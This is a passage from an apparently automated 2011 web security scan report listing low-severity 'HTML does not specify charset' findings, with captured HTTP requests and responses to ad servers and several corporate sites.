GET /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 21:49:02 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:49:02 GMT
Content-Length: 34791


<html>
<head id="htmlHead">
</head>
<body onload="sClock();">
<form method="post" action="DesktopDefault.aspx" id="ctl00">
<div class="aspNetHidden">
<input type="hidden" name="__EVENTTARGET"
...[SNIP]...

27.38. https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx

Request

GET /FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-US&OU=0&ItemId=35715 HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 21:52:54 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:52:54 GMT
Content-Length: 16812


<HTML>
<head id="htmlHead">
</HEAD>
   <body>
       <form method="post" action="SecurityAdvisoriesView.aspx?Alias=www.fusionvm&amp;TabId=0&amp;Lang=en-US&amp;OU=0&amp;ItemId=35715" id="ctl00">
<div cla
...[SNIP]...

28. HTML does not specify charset  previous  next
There are 30 instances of this issue:


28.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2886.151350.QUANTCAST.COM/B5403001.14

Request

GET /adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=REAB01&cb=1243611902
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:39:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7009

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...

28.2. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.no_url_specifiedOX2487/B5076164.3

Request

GET /adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003H/31000000000039414.1?!&&PID=8013955&UIT=G&TargetID=8303500&AN=805437803&PG=INV4QC&ASID=ffd2abd4093544b9a0ee74b8349ad9b0&destination=;ord=805437803? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:36:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 556

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/4/0/%2a/s;
...[SNIP]...

28.3. http://ad.doubleclick.net/adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21

Request

GET /adi/N5092.152847.MICROSOFTADVERTISIN/B5103858.21;sz=300x250;click=;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00047/47000000000040614.1?!&&PID=8370651&UIT=G&TargetID=8192380&AN=2047363577&PG=CP49XU&ASID=592c970828da41888e4fe12bfdeb5382&destination=;ord=2047363577? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5468
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:41:26 GMT
Expires: Tue, 26 Apr 2011 18:41:26 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

28.4. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6448
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:39:22 GMT
Expires: Tue, 26 Apr 2011 18:39:22 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

28.5. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.msn/B5302320.25

Request

GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 37343
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:40:37 GMT
Expires: Tue, 26 Apr 2011 18:40:37 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...

28.6. http://ad.uk.doubleclick.net/adi/ads.idg.co.uk/cw-welcome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /adi/ads.idg.co.uk/cw-welcome

Request

GET /adi/ads.idg.co.uk/cw-welcome;kw=hp-igsusa-apr;sz=640x480;ord=4922060? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 36924
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 21:49:38 GMT
Expires: Tue, 26 Apr 2011 21:49:38 GMT
Discarded: true

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects)
...[SNIP]...

28.7. http://amch.questionmarket.com/adsc/d840009/7/41115363/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d840009/7/41115363/decide.php

Request

GET /adsc/d840009/7/41115363/decide.php HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.uk.doubleclick.net/adi/ads.idg.co.uk/cw-welcome;kw=hp-igsusa-apr;sz=640x480;ord=4922060?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:49:17 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: CS1=deleted; expires=Mon, 26 Apr 2010 21:49:16 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1; expires=Sat, 16 Jun 2012 13:49:17 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0; expires=Sat, 16-Jun-2012 13:49:17 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Set-Cookie: linkjumptest=1; path=/; domain=.questionmarket.com
Set-Cookie: endsurvey=no; path=/; domain=.questionmarket.com
Content-Length: 1042
Content-Type: text/html

/* b203.dl - Tue Apr 26 12:42:39 EDT 2011 */
(function(){
var d=document,s_id="SafeCount_Link",b;
function z(){
var ifr=(self!=top),sd="",b;

try{
b = top.document.body;
ifr = false;
} catch (e) { }


...[SNIP]...

28.8. http://amch.questionmarket.com/adscgen/st.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Request

GET /adscgen/st.php?survey_num=840009&site=60630073&code=41115363&randnum=4925450 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.uk.doubleclick.net/adi/ads.idg.co.uk/cw-welcome;kw=hp-igsusa-apr;sz=640x480;ord=4922060?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=725047-17-3_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1; ES=724925-fwM$M-e1_865756-Ihl$M-0_859330-mt!$M-0_851211-g|0'M-0

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:49:14 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b101.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 789
Content-Type: text/html

(function(){
var rp=parseFloat("100"),r=Math.random()*10000,s_id="DL_840009_7_41115363",w=window,d=document;

function z(){
var s,i=(w==top),u;
if(!d.body){setTimeout(z,100);return;}
if(!i){
try{
s=to
...[SNIP]...

28.9. http://analytics.live.com/Sync.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.live.com
Path:   /Sync.html

Request

GET /Sync.html?V=3525&AQNT=1 HTTP/1.1
Host: analytics.live.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=1; MUID=B506C07761D7465D924574124E3C14DF; wlidperf=throughput=13&latency=225; wla42=; LD=9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_00381e4a312_15501_1303568379549=L2450|U7591047&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0046b7cd8dc_15501_1303568381496=L1240|U7589087&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0018fbb5ebe_15501_1303567265251=U8722104

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
ntCoent-Length: 607
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 11:01:13 GMT
Accept-Ranges: bytes
ETag: "eff9f76f28e8c91:823"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:35:42 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...

28.10. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/ActivityServer.bs

Request

GET /BurstingPipe/ActivityServer.bs?cn=as&ActivityID=38733&rnd=388470.84529697895 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.freemanco.com/freemanco/?fs=true&_requestid=118715
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; eyeblaster=FLV=10.2154&RES=128&WMPV=0; A3=iQQIaFx503Dk00000iZLfaFB607pd00001j4HbaE.a0a9y00001jcM0aFSa04m400000eDVwaDPh084o00001gY2paFS+09nl00003hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002johvaFxN07uh00002hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j2fVaFWf07aw00001j2VdaGye07aw00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001iBU1aEBz0aVU000019rW0aFGt04uw00001; B3=7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh9abz0000000000ui52BU0000000001ui9fJa0000000001ul8TfJ0000000001uh9eB50000000001uj93M20000000001uf9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9qqo0000000002ui78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh7.Ws0000000001ui99y10000000001ui80Dr0000000003uj

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 26 Apr 2011 20:11:04 GMT
Connection: close
Content-Length: 103

ebReportingImg0 = new Image();
ebReportingImg0.src = 'http://ad.yieldmanager.com/pixel?id=962756&t=2';

28.11. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=1620481;type=tdame177;cat=conte520;ord=1;num=6591672650538.385? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://theinvestedlife.msn.com/?source=msnmoney
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 26 Apr 2011 18:39:32 GMT
Expires: Tue, 26 Apr 2011 18:39:32 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 486

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- "TD Ameritrade"
...[SNIP]...

28.12. http://freemanco.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://freemanco.com
Path:   /

Request

GET / HTTP/1.1
Host: freemanco.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:06:50 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
Last-Modified: Sat, 17 Oct 2009 14:09:30 GMT
ETag: "be-476220fa0ba80"
Accept-Ranges: bytes
Content-Length: 190
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final //EN">
<HTML>
<HEAD>
<title>redirect</title>
<META HTTP-EQUIV="refresh"
CONTENT="0;URL=http://www.freemanco.com/freemanco">
</HEAD>
</HTML>

28.13. http://g.adspeed.net/ad.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g.adspeed.net
Path:   /ad.php

Request

GET /ad.php?do=html&zid=14678&wd=728&ht=90&target=_top&tz=5&ck=Y&jv=Y&scr=1920x1200x16&z=0.07491016224958003&ref=&uri=http%3A//seclists.org/fulldisclosure/2011/Apr/388 HTTP/1.1
Host: g.adspeed.net
Proxy-Connection: keep-alive
Referer: http://seclists.org/fulldisclosure/2011/Apr/388
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://g.adspeed.net/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store, must-revalidate
Vary: Accept-Encoding
Content-type: text/html
Connection: close
Date: Tue, 26 Apr 2011 21:51:37 GMT
Server: AdSpeed/s6
Content-Length: 789

<html><head><title>Advertisement</title></head><body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0 style="background-color:transparent"><script type="text/javascript"><!--
google_ad_client =
...[SNIP]...

28.14. http://kbportal.thomson.com/display/2/_dividerFrame.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/_dividerFrame.html

Request

GET /display/2/_dividerFrame.html HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/index.aspx?tab=browse&c=&cpc=&cid=&cat=&catURL=&r=0.8218797
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_sq=%5B%5BB%5D%5D; s_ppv=100; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Content-Length: 285
Content-Type: text/html
Last-Modified: Fri, 19 Jun 2009 02:38:32 GMT
Accept-Ranges: bytes
ETag: "04f987f0c91:268"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:04:42 GMT

